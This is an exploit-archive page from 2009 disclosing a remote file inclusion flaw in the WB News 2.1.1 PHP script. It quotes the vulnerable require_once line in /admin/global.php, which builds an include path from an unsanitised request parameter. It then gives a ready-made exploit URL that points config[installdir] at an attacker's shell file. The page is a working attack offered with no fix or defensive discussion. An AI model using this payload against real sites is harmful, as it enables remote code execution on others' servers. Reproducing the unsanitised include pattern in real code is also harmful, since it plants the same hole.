[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : WB News 2.1.1 config[installdir] Remote File Inclusion Vulnerability
# Published : 2009-02-09
# Author : ahmadbady
# Previous Title : sourdough 0.3.5 Remote File Inclusion Vulnerability
# Next Title : Gaeste 1.6 (gastbuch.php) Remote File Disclosure Vulnerability
-----------------:Remote File Include:-----------------
-------------------------------------------------------
script:wb news v2.1.1
------------------------------------------------------------------
download from:http://www.webmobo.com/downloads/
------------------------------------------------------------------
.......................................................
vul: /admin/global.php line 32;
require_once( $config["installdir"] . "/includes/constants.php" );
------------------------------------------------------
-----------------------------------------------------
xpl:
http://127.0.0.1/admin/global.php?config[installdir]=shell.txt?
***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]
from[iran]
---------------------------------------------------
# www.Syue.com [2009-02-09]